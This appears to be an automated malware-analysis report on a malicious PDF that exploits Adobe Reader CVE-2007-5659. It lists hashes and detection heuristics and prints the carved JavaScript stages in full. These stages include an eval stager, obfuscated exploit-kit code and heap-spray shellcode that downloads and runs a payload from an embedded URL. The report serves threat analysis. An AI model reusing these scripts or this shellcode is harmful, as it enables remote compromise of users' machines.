PDF malware analysis — malicious · 1caafcbc152806a9

MALICIOUS

PDF

16.0 KB First seen: 2026-05-08

MD5: 68cd8d194406a828cc448abc876763ca SHA-1: cc353b38f6e5afc18bfdc1327cd5dc30ba5da04c SHA-256: 1caafcbc152806a9b5bd699ee1ea8465ee78c7e1a77f732fe07466d5e9587619

266 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and streams. The extracted JavaScript files, particularly 'legacy_pdfkit_stage_000.js', are large and appear to be obfuscated, suggesting they are designed to perform complex malicious operations. The 'PDF_FOXIT_SYNCANNOTSCAN' heuristic further points to a technique where the PDF launcher decodes and evaluates JavaScript. The primary intent appears to be the execution of a second-stage payload via these scripts.

Machine Learning

Nyx PDF Classifier malicious score 0.9999

Heuristics 9

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 4 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.

Matched line in script

var Ove55p__x = new Array();var T_8_wO7d = 0;var H82146xXe0d = "";function AL7XRrh3(j_pkA83, M_Fl76_wyp){var SS0__b_UY4 = M_Fl76_wyp.toString();var TD8X5B_W = "";for(var qYQ_xO___8 = 0; qYQ_xO___8 < SS0__b_UY4.length; qYQ_xO___8++) {var rg__M2L_e_1aWxx = parseInt(SS0__b_UY4.substr(qYQ_xO___8, 1));if (!isNaN(rg__M2L_e_1aWxx)) {rg__M2L_e_1aWxx = rg__M2L_e_1aWxx.toString(16);if (rg__M2L_e_1aWxx.length == 1) { rg__M2L_e_1aWxx = "0" + rg__M2L_e_1aWxx; }else if (rg__M2L_e_1aWxx.length != 2) { rg__M2L_ …

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
```
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN

PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://gripioro.info/page/index/n003106201r0409R59587819X3f65747eY5b74c9e5 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0004_000.js`	pdf-javascript-stream	PDF /JS object 4 at offset 0xE1	1814 bytes
SHA-256: `b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; function decrypt(str, jump){ var result = ""; var list = str.split(','); for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); } return result; }
`numeric_charcode_stage_000.js`	deobfuscated-js	numeric char-code string decoded JavaScript at offset 0xEF	469 bytes
SHA-256: `4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var pr = null; var fnc = 'ev'; var sum = ''; app.doc.syncAnnotScan(); if (app.plugIns.length != 0) { var num = 1; pr = app.doc.getAnnots( { nPage: 0 } ); sum = pr[num].subject; } var buf = ""; if (app.plugIns.length > 3) { fnc += 'a'; var arr = sum.split(/-/); for (var i = 1; i < arr.length; i++) { buf += String.fromCharCode("0x"+arr[i]); } fnc += 'l'; } if (app.plugIns.length >= 2) { app[fnc]/**/(buf); }
`legacy_pdfkit_stage_000.js`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x1BCE	11929 bytes
SHA-256: `a1e278df22599d140d302fbd3468a04770d7e881a1599fab3e7405036cbcdef1`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function c_y8lL_4i(n_Yx3ve8Ix, INae_XW5t_m){var fgh = "va";var VR4gTL = arguments['cal'+'lee'];var r_3bjFX7_3 = 0;try {var Sm0e_Fy7D1MG = 0;if (app) {r_3bjFX7_3++;INae_XW5t_m = pr[Sm0e_Fy7D1MG].subject;}r_3bjFX7_3++;} catch(e) { }var r7J7oOkh = new Array();if (n_Yx3ve8Ix) { r7J7oOkh = n_Yx3ve8Ix;} else {var u_p5Hg = 0;var rDf_J___66xTc0 = 0;var tR0C_65I_c_mU = 512;var SJ__gC0__Xr = 53;VR4gTL = VR4gTL.toString();SJ__gC0__Xr = SJ__gC0__Xr - 5;var H7_uD272Rb = SJ__gC0__Xr + 10;H7_uD272Rb = H7_uD272Rb - 1;while(rDf_J___66xTc0 < VR4gTL.length) {var S_U5_p = 1;var fNnUSt2tdo48r3 = VR4gTL["charCo" + "deAt"](rDf_J___66xTc0);if (fNnUSt2tdo48r3 >= SJ__gC0__Xr && fNnUSt2tdo48r3 <= H7_uD272Rb) {if (u_p5Hg == 4) {u_p5Hg = 0;}if (isNaN(r7J7oOkh[u_p5Hg])) {var Sm0e_Fy7D1MG = 0;r7J7oOkh[u_p5Hg] = Sm0e_Fy7D1MG;}r7J7oOkh[u_p5Hg] += fNnUSt2tdo48r3;if (r7J7oOkh[u_p5Hg] > tR0C_65I_c_mU) {r7J7oOkh[u_p5Hg] -= 512;}u_p5Hg++;}rDf_J___66xTc0++;}}u_p5Hg = 4;for (var t__13_Yc__mW_R = 0; t__13_Yc__mW_R < 4; t__13_Yc__mW_R++) {if (r7J7oOkh[t__13_Yc__mW_R] > 256) {r7J7oOkh[t__13_Yc__mW_R] -= 256;}}var RU5_O5g = 0;var D_b2_8a_I_O_nn = "";var pu_PPieO8 = 0;var rEA3Lr10k = 0;var a6d_8X8_V5Qx = 0;var OY__o__o0_5_n_6;var T___K55i = 23;while(rEA3Lr10k < INae_XW5t_m.length) {var X_RvD10 = INae_XW5t_m.substr(rEA3Lr10k, 1) + "YY";var bfOc7TQowBa2la = parseInt(X_RvD10, T___K55i);if (pu_PPieO8) {OY__o__o0_5_n_6 += bfOc7TQowBa2la;if (RU5_O5g == 4) {RU5_O5g -= 4;}var wTvA_2p8t1U = OY__o__o0_5_n_6;wTvA_2p8t1U = wTvA_2p8t1U - (a6d_8X8_V5Qx + 2) * r7J7oOkh[RU5_O5g];if (wTvA_2p8t1U < 0) {wTvA_2p8t1U = wTvA_2p8t1U - Math.floor(wTvA_2p8t1U / 256) * 256;}wTvA_2p8t1U = String.fromCharCode(wTvA_2p8t1U);if (r_3bjFX7_3 == 2) {D_b2_8a_I_O_nn += wTvA_2p8t1U;} else if (r_3bjFX7_3 == 1) {D_b2_8a_I_O_nn += bfOc7TQowBa2la;} else {D_b2_8a_I_O_nn += rEA3Lr10k;}RU5_O5g++;a6d_8X8_V5Qx++;pu_PPieO8 = 0;} else {OY__o__o0_5_n_6 = bfOc7TQowBa2la * 23;pu_PPieO8 = 1;}rEA3Lr10k++;}var aa = this;aa['e' + fgh + 'l'](D_b2_8a_I_O_nn);} c_y8lL_4i(0, "4kab4aa12f8e384c105d2db139aa0d1k2aaf2d6db28a1j2m1k2a966015230i9ca8a98k5j056l87ah71386i217g31929e60996i09655h64837952590j4a0d442f408j6gam6i7i6i40675b2e6m46074c1659ai29434c7e4c0e2533182d06162h89318f0a31308h2a592f5j1623971c033m09a906agad788k1c90229a8m8k2e7m0h9a07a77m6i8c9806975f8d6385ai568e88ab7l10686a4k834b3d611f310d2i412e8j570m5d555b5151224h9932214c2c34a92l65b163aiad0d222f5l10212aa412a90j2h8m628g8eaf2ial2gai219m738686aa15a67ma6617c229ea27m21993581a97i6l56584lad855j6j7g3h2k6d0a5m9e3h475a7k547j504b5h4b1f0d198j3m024b1l2986403m27470cb1272421441c8caca4257h1k3i1d2a1677ah21110aaja9ad43824k81847a369m496cai67959e9f8d1e5j8a87717g415bal74276l376ha17bb23i56334i6a5458864702401j4ja9276e3g8g4k8b2122425330211m7c1fa92b31b27g188j2c2g2220092m1b6a11ah8k8g9556944gai227j9ia7219g1h7b9d947b8l5e8h0a9b5l6061832g7mb27h7f5e26425e455g7c226k285i214h4h4aa956062h7g436157222b6l11000i0b0l7f3h862f7e1eaf174j2364ah23100j248j955h0j8414998a5602b2862kah79a39e7l039e7k983f944b9l076a2e8d4d8904845k4j634c054f227m437729650a548a4k535g7e349l4d5l5h0f2laa1b611j7h21a14f731l4f2c3017b11maa0d1k2eah1c970b5f042k104j9e7fb033119c8d7fa24f8e7785969i4b7m59ad32999597af621k715l7f556a4j729e7h277d5f7dai3f8b395l3c0j6j224k72391h300d4da11d51174m1h8d0i2d0c471j082a7f15a91k1ba88l2g7j26220c0g18219l601807168j0272b01c9022ag8mag2d890j7c86a27l898c9b1591545h3b62aj61ae7f7f4g3265816d6d675i72333l26506m33am560l528c4k252h38157f18aa4f0b2c9i387l0i7e382c362m225f1kaab0839d88971g9a4kai8c0b4j912g0b32095ca89ka3ac6k8l9e659m5262ai8kaa5l367aaj7i6h7c8d873753516573482e6b12670462292h632a7k2d225k0f3h1a4d8220a94d2g4b5h375j32221287ai00001m057f2j8j025l0g11ae4j034j9kaa8aa8847f87329f70abac7l4jab53a9049586907f65ah5d6m57475a226mad5b1h52416fa14jaj698c6j4966224k72391h300d4da12h7j488d4a064a563m5a0633109b39ag0c102c5jaa6m2a48a6011e140f6l0ia9988b86768l408d2la59e9m17a604af06968164678f036c33836b8baa637a80af83105c8a798c7a2a39ab3a0b6c6i627f41092k5l4b4m2l463m8b34310g1h0a9e3l7a0e68320e235h2664aj0b28am1l7fb14eaa7g079b014j9k310521b05jadag739g756g9c49944j94a88d108f4e81b051734i6j861g4m3d7a606b2m6e0a41866655678c45ab53525h2g4gai1b5d4j881da31056083f18220991b2aa3651227fa6891a68122k124j0b6c0d2hb21h82837j417d638d7i905j9121802h838i9fai8b0a6284857g815h7j994a365e57608c4ga073855g1c5c223k5c473148al37b23a6c4m803i97195g454l3k2m3d721dad0m331m7m1g7h09541k171caa9c369f848c8h8f619i498e33a58m8f1b9g188l066a5h646j9f07683d8j4e7k2m80a45a867m4g6m8b7b966h5b69ah3ham2i5i5a935206527e4b3l4d5c3ma6180b4h4c26ad1f802f7m291b12542d6425aab083a58j1353194k919lal45al3i9m21a9798a7f89987d616e6a8j458j077k21873l687f665k745i7006524j796k5h2e421065b161615j612aae4f454f4b3g214382248318aa0e8j426a3f221cb134332e4e247f016d0l5i0h0m9m4j137dae2e8m1702ab064eb07ja795ag2aa73j8f21a2828ha98b0f5k5b8k7h745h86117j294c374k814jaa6a4k3b2c5e5g6a8j522a2g294jb14f7a4a4k279h0i2j0l2145aa1g9b38082i31284k05509l2i9f9g9iaaah6016080gag0661805d944j9d728621ag33969b985m907e900i893i8b647k2f7c7a5k7f613h7g8g738a6g3653244c235c7156a93m0e5a7e522g1m3656aa3a1a3a472ba92l7l0m4k0l9k0j4j1547b12128080l880h27137k0m9b0m5584177l007f5i798987ai9e6m7b3m925j9aa47f25714081ah7i8e6b7m7m247e4h40593hac449c378j49534i5h3b9j5l5a4b2b4d0i458245a93e0e3g87326m022dam9125aa0d1ka688ae6faj6g141e0j4j0j7d0510071jajb07j3d8j4k828ma5536i1g6k0h90836k8g8b388j5b8c77885488104ab04462699i69b25a7e5k3d3l2b2e5h28022ba55i92475k245l3i12434f284m1h232h9j2ba914392f7e277f9j389d9ia000934a1g070c000a7k8851a545a5a196219g2c7h7f7f4b7e7e80a16g4j93625h2e7kaj7g047b19428j5e8d4a3361204b1b5c5c4h062693364k1j2a542415790m0h3a2d178g2l8l367a34151c4j2m5b1e2118949b83952a0b4k94699k4ja60j8m2106809m019e089e8g8f5f924j73a6702j81378108728e7c7e5dad4h38404l4l38560d428g5g534371548f495j1l132laa1b5d4j881dah174m1c74325h3c0h2maa124hb18g1c97b271101g055ja18k0c300e170eaj036b7d75a18e7m4294348c21a2697j9j8b397d6m7b4j4m5e700g742j6l576fa9697m4656724e60565l8c28ai3l164d073f5k3d5b4808445444540g0215a621ab253j1m7e1g7h1a2iaaa29736ak5a0907aea1ac4k8b2i7h3l9f8mb01991217k0d866f8l8f80037l226f2h6m1b7e026g9h6e1e7g8d6g97755f6b2f63ai3b4b619m52065c7e4b4m454j1l7i1e02121f40af3j8k3b86ai0d1d4j2l5c0m1dal1119051b4e1b81109i8a52al0i02219m5d87889k17947m6m4b922i71ac90217d205j7f7c926l758007704d6h6m4c31408j54a94g533h684e7j4l2m3m115e31458l13aj1d292l7512680k2l2m9533aa0d1kak08ae9ba87ia2319j50a18d072k8805a6a90b549f737791715ia448a325929c9080852j7e758g547g4d7a0g55314d3h7fab75765i5i5e1f3g4j6086482e22081j923b4i3h714e0b1e2a224i0m062l9l2b9f070ja86j1g6h1a33b10ha1219l57948j13ai0g4kak46ab48ak8m9721970i9cae764b7a4k9e1a8f5g875d8e27557c4j055a1g545d41994f2i49b236303k4f3e882b152i5e4h521g5i427m1k090l441c88125k038d0had072iab73am23af8k9g05a12c0k7l8la2992m002j83308a5b8a8h781l7d5f7d5h6d5i73ab6h095i4k888b828h508d5c087253457j6i28449j3a053l385g5k2fai524m2m191k30228944ag122e3e7h154a075i2j982d26af5d22ag1h999k8d17341153928c9725971587058k5m8b5m7c087h507b256h3093728k895m37645h6653545i599m530849664m8b4d873e8d3k1c5i2m2j95340330al21054b4e455d138k1m5j385e06163h900a932l241m8c227haf22aj9g99af1e489b8d95840j5m8g2a8a2701777l057f00a98h73596k4m5l9f5f245e6a65005m834j055a1g545d41994f2i49b236303k4f3e882b15325d2j2l1g5i1l7e3m080l4413880k5k038d2f1e022iab731k09aa8j9g059l290k7i8la2932i8k0f83308e5c87ag781l7g5d9a3f6d5i6i876c005i4k678g5h6d508d5d274m50457j4a25489c3a053m323h7h2fai50512f3d1k30286924ac122e3e7h114f075i0k010609af5db08cai769k8da60ja451928c9f24981787058f608c5l7c08a2327j456h306m6l6mab5m378b5l6359545i599g5b2849664e88487m3e8d641l5k2k2j95372831032105264b267k16111h33152h0b30107c0h8daj40047jb17la15i1b1ea504966m9jac968l8b8db02dah337g9l7l007m0k6l0573546k5d631h8e326a5e58305l835b8f4d4g4i5d4f8h3i5i68224105307f3a8f339f258d2i2l28321aae1f001c3c0f0535800l5ib02a29530467a530ad8ma9ag9a59a05e0b7b8f5i8k0jal257k8882887ja2728d7f5i712i67046h018c425c055m6g5g5f4h334m2m4m543m30449c3l8934625h7l337i295i2e3d2d061e91218h1i1h0j8d1649102j010k0602084ha905ai79ad5g9e3j9m4m9l5c8j3098aa8i88816i8e5ea8ae765i9j467c246b9h6m8d6c2e5g8d64555m334l1d5303543b43056fa34a5g384c3l34376d2d3050022c8b1i7b205h1l97105i1b2m112705aa0g8d0b18ad8dam5j1e319i26a0009h4790059dai947h85558a2ma96m7a30800j7c886f846k5d6ia25k5i873a5m0352005c88561g478d4h6g4b2l3c2m62283g4f2h0530982l5j1m5l4c33267h14301g191388098k0k7g08ajah5i0146ag019m0ga98e134h948d9e95932m893f8m038d5h7e057ja59i5f6j6e792i6m886130661k63ab569d7f5h5c084b5i4l526i283g1943893f3a2l8d3b9m323123482b25296618051kal1f7h0d7712330e04al30282iak8ba3a6ag7ha712985i9f5c9e068d22008d8c3l7i8da58k7k2l70517901737365056a0a877j5a805i2l7e9l4f304k5e6kac3kam435d603j325i5d6b3423272i2c8g2d4f1c8d3m053g2j0h5h0m030g9gb2050810247ga78g1h2j1a1a9c309i679eac8h0c035k902a7m5i8c928327743b7b8c787b698d8k10682l5e6a64245j894j05553k4i7i41994b52482336303b4i36ad2b15317h4g541g5i269i1f040l44388d0k60038d0d1h254mab731i03af959g05134h0j5l8la20853022m83308g7faaag781l7d7k7b5l6d5i748f8j255i4k68ab828k508d5c2a4m52457j6h026a9k3a053i353g5g2fai354l4j3b1k30256721ac122e197l126a075i0g010d00af5d008hal7f9k8da20ja32j928c9e0497ad87058j3i8d5h7c087j537e446h3075716iag5m376a5m6552545i5fa25a0049664l8a4ea73e8d3l3j3j532j953727310421052c6j265j16111i2i17520b300m7h0g89aj40007lb15la15iac1da609966m9h8d9b8j8b8d8i4d8h337g9l81007l2i6l057657705d631h6b2i653b58305g855a8e4d4g4l5e4f693i5i43b24102307f3888329c258d2f3027341aae1i091c190f0510650h5ib02a0533b24aa530ad95a7899a599i5g9e7a8f5i900l8k067k88858f7ma6728d7a3l742m67046h096c225c05606f5e5i4h33522m4j533m30479l448b34623c5i398026364h4353b13a684f8b2g1f3i8e1k492j4j24870jaa305621031g99207k9h3ma34j197k9f000cab8a9e0a588668ah9f9i5h9l4278am668a6la36d0a85867m67862b52a484237h2d5a8e578i637e624g2k382e6564042ial2c88264m517g4e8b433236451j211b93ak8lae341m7e15891a44140la7230k4299am0905058c001c84228679am23acala59m96759g7e8f0i894j623e530d4k8m5d975k3h6j7j7g5g43223f2e41214m5c56934f932g8g2d361k3631923g322i2d2g7f1a54267e0bai194b0m5a1e33a29m0ca91k3ib17395690j49b02g0721a979a3a97ja57661a85h9l229i9a761c724h729g6288874k5iad4e564g7e611f450a408b6237664k30722k5l2i18280022611c8729b026693268315m1005302kaa252iab286d1j5k101d0h4j0b5k0h2ha09c987f8c467d8487ac8b4j9c427d2d9g7g608k5h3777677a5j8c3k6ha16l2j582d758f698g637e5k1k635c46602jaj22313k064d4g25883i024e4f3j31300h2h9b2b8g2h3h0k7ca2669j3l0e171m19005c8i838cajb07ea64lab44a58d85239l0e7k0dab7c9k868j1g8j5c8i2h7c1973a45da9594j527e4j6c3l2b76305k2k2i68568g4e19316d4b4m31222b6l11ac1k3c3k02045c3a781i1b35431k641e089h999b88a91g1878aj931343al2gaf087f5k79897lac6k899251925l83a88d216e1f5i81519j747e5d1i83335g6k6b0k3b974b7f6f5i5g8b589l5f52260h1k3022861jad122e177i116c042b101537232k1k138c1c77ag5l1k03a9228m4l9i280f1m8280055d9g7e009j9i4j9c296c0d666h747f96227e7e91687g4j7aa14a0c443d4j884j766l78563d6g43588652082dag257f5c5k247e1i9c1j5g0c2c1caa299b0ia038180l7e1g6db063221g182l9f6412am0gai00720c4m04527b7b750ja932a0ab9752928795188f5091488b2381ah69b1794a4a8j7a996a574aa933ac373m5k03589i206m2e4m253326ac50aj1k373l000i82357k2b271f562b6a0l30268b0ea9a64a1e6l9g988j3612300b2gad87adb2ac989i5ka76i9b5f70aj8d2687206780848e755f592l704j4i4m5maj7a1a61022m485g6k37am4l4j2h3959aa2f5839a91l1f496l186d16562k87b1ai2a4e1b8aaia1167ea40m0522a4628e08889i887fam5ja05f84039i4j7d248haa7b6171866b085k4k95874m557a0755047f576f8a4b9b3962331j3b2j305c67274jb153a93k4g255d3i0a32540k2j12am006jb2050435b17ia78gac50a61b99am916909a2978j0e7eah278d477k799e19952c7fa97b87747e6la0602b6d6i87284k7i6daf681k7m7e6d6c675j3ga97023667a33ad5d0c4j8a40594j5236ae4eai2f3b2a8c417l2f5g292bal36347b2e23248307a9am4aa068ak73012ma5b294aa885j00abag989m6c9864925i628k5j23914f5l00889d7k6f7l315a537a7g3hai750c6i7f4b585a5d367k4l4d4f1d43aa2f581j8j0k0a3d7e114a0k4j27b10b1iaa32a4ah0a971i7e1m0h1752137l132a9c9c9eaead3i895fa1a69i30961j70aj66a09hab97ah8b7e7082854j64af741c6l4b717f4l766b6c5k425e5i547157212ib12ea9416c25783g924c52425f3a2h397l2lagae0f257e0h8i1m4jb1050l1c0f540i7f9j7ma57e9h468i3d9f6m9m0490046g0b6a6a8l6e8fa57346635b60184k8g4eaf722i7k836d74554j5c204m2a3m3m6d0d5a0d20554d5g4m2g4ma23m323g412iaf3h8i3287319k0f38a64cae01aa8m9b7l9b1gal7eaa939b3da80gaf049g4f8e7f859m7e5g702la7418j988d08713861a95l7l4i634c0c4k2j4j577i236m143j9f494545875aad4022340f4d07529546021i23387j324a123622b10e21323l01ae9l7j9f7g1h3e9h5g0h8bak2b0d19a305083a7f7gai037f428534812h969c7j805jah5m4k74716g4j5hab6e016l3a5m8677ag5e8c6g4066542m5l28al22a7257h223i255d1a9f");
`legacy_pdfkit_stage_001.js`	deobfuscated-js	nested inline base-23 callee-key decoded JavaScript at offset 0x1BCE	4952 bytes
SHA-256: `69e8204b2fae43f1b822726cf6b3623a78c75254ed168cfb145627604b447cc7`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var Ove55p__x = new Array();var T_8_wO7d = 0;var H82146xXe0d = "";function AL7XRrh3(j_pkA83, M_Fl76_wyp){var SS0__b_UY4 = M_Fl76_wyp.toString();var TD8X5B_W = "";for(var qYQ_xO___8 = 0; qYQ_xO___8 < SS0__b_UY4.length; qYQ_xO___8++) {var rg__M2L_e_1aWxx = parseInt(SS0__b_UY4.substr(qYQ_xO___8, 1));if (!isNaN(rg__M2L_e_1aWxx)) {rg__M2L_e_1aWxx = rg__M2L_e_1aWxx.toString(16);if (rg__M2L_e_1aWxx.length == 1) { rg__M2L_e_1aWxx = "0" + rg__M2L_e_1aWxx; }else if (rg__M2L_e_1aWxx.length != 2) { rg__M2L_e_1aWxx = "00"; }TD8X5B_W = rg__M2L_e_1aWxx + TD8X5B_W;}}while(TD8X5B_W.length < 8) { TD8X5B_W = "0" + TD8X5B_W; }var PQi_4_uwy4dSe = j_pkA83.toString(16);if (PQi_4_uwy4dSe.length == 1) { PQi_4_uwy4dSe = "0" + PQi_4_uwy4dSe; }else if (PQi_4_uwy4dSe.length != 2) { PQi_4_uwy4dSe = "00"; }TD8X5B_W = "3" + PQi_4_uwy4dSe + "P" + TD8X5B_W;return TD8X5B_W;}function x7_tf80l6(MvT0BoK_th_3, W5Y33_n_Nl){var A_P48_vm = new Array("");var Ib48__AR_DSv = MvT0BoK_th_3;var JcBa_g__Ggo_m;if ((JcBa_g__Ggo_m = MvT0BoK_th_3.lastIndexOf("%u00")) != -1) {if (JcBa_g__Ggo_m + 6 == MvT0BoK_th_3.length) {A_P48_vm[0] = MvT0BoK_th_3.substr(JcBa_g__Ggo_m + 4, 2);Ib48__AR_DSv = MvT0BoK_th_3.substring(0, JcBa_g__Ggo_m);}}JcBa_g__Ggo_m = 1;for (qYQ_xO___8 = 0; qYQ_xO___8 < W5Y33_n_Nl.length; qYQ_xO___8++) {var G_sxl_h = W5Y33_n_Nl.charCodeAt(qYQ_xO___8).toString(16);if (G_sxl_h.length == 1) { G_sxl_h = "0" + G_sxl_h; }A_P48_vm[JcBa_g__Ggo_m] = G_sxl_h;JcBa_g__Ggo_m++;}qYQ_xO___8 = A_P48_vm[0].length ? 0 : 1;A_P48_vm[JcBa_g__Ggo_m] = "00";A_P48_vm[JcBa_g__Ggo_m + 1] = "00";JcBa_g__Ggo_m += 2;if ((A_P48_vm.length - qYQ_xO___8) % 2) {A_P48_vm[JcBa_g__Ggo_m] = "00";}while(qYQ_xO___8 < A_P48_vm.length) {Ib48__AR_DSv += "%u" + A_P48_vm[qYQ_xO___8 + 1] + A_P48_vm[qYQ_xO___8];qYQ_xO___8 += 2;}Ib48__AR_DSv += "%u0000";return Ib48__AR_DSv;}function V_35NWJN_x(JR_wPPT, qUa_q_____04){while (JR_wPPT.length2<qUa_q_____04) {JR_wPPT += JR_wPPT;}JR_wPPT = JR_wPPT.substring(0,qUa_q_____04/2);return JR_wPPT;}function e_3l_U550_gUg(D_06ci_N3, YjQVp4_Y_a2v, M_H_8BR1_4O){var i0pUV1_23h5r = 0x0c0c0c0c;var JR_wPPT = unescape(YjQVp4_Y_a2v);var W5Y33_n_Nl = AL7XRrh3(D_06ci_N3, M_H_8BR1_4O);var b__Tn_P_V7ad3 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var MvT0BoK_th_3 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4b70%u6979%u0071%u7468%u7074%u2f3a%u672f%u6972%u6970%u726f%u2e6f%u6e69%u6f66%u702f%u6761%u2f65%u6e69%u6564%u2f78%u306e%u3330%u3031%u3236%u3130%u3072%u3034%u5239%u3935%u3835%u3837%u3931%u3358%u3666%u3735%u3734%u5965%u6235%u3437%u3963%u3565";app.O7q3J_ivC2__V = unescape(x7_tf80l6(MvT0BoK_th_3, W5Y33_n_Nl));var C6FC__dy = 0x400000;var m7_RD_BW = 